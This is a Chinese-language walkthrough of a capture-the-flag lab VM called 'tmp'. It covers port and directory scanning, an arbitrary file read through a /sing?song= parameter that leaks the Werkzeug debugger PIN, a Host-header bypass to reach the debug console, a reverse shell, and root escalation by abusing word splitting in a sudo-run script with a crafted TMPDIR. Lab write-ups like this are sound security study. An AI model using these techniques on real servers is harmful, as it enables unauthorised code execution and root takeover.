群友靶机tmp复现 - 场

Tmp

nmap -p- 192.168.10.4
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-10 07:20 EST
Nmap scan report for tmp (192.168.10.4)
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
MAC Address: 08:00:27:88:55:23 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

5000端口看一眼，是flask搭的。

gobuster扫一下目录

gobuster dir -u http://192.168.10.4:5000 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x html,txt,php,asp,aspx,zip,jz,js 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.4:5000
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,asp,aspx,zip,jz,js,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 400) [Size: 167]
/songs                (Status: 200) [Size: 165]
Progress: 42714 / 42723 (99.98%)
===============================================================
Finished
===============================================================

有console，开了debug模式，算PIN码就能拿到shell了。翻了翻，在index.js中找到存在/sing?song=测试了一下可以任意文件读取，那么PIN码就可以读取或者计算了。

curl "http://192.168.10.4:5000/sing?song=/proc/self/fd/2" -s | grep -a "PIN"* Debugger PIN: 134-800-774

直接 拿到PIN码，但是访问console 400，报错页面开了禁用debug，js去改但是有了>>> 但是依然没有交互。

然后后面搜了搜，应该是Werkzeug>3.0.3版本仅支持回环地址或localhost，需要改host。

因此改下host即可输入PIN码，开始交互。我糖了，让ai写了个脚本交互。

之后反弹shell，拿到tuf权限。开始提权，注意到脚本中$SANDBOX_TARGET_FILE变量在执行时会导致词分割，同时配合TMPDIR变量让其执行我们的恶意脚本。

tuf@tmp:/tmp$ vi exp
tuf@tmp:/tmp$ cat exp
#!/bin/bash
/bin/bash -p
tuf@tmp:/tmp$ mkdir 'exp dir'
tuf@tmp:/tmp$ chmod 777 exp
tuf@tmp:/tmp$ sudo /usr/local/bin/getflag TMPDIR '/tmp/exp dir'
root@tmp:/tmp/exp dir/tmp.IaiKDa# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)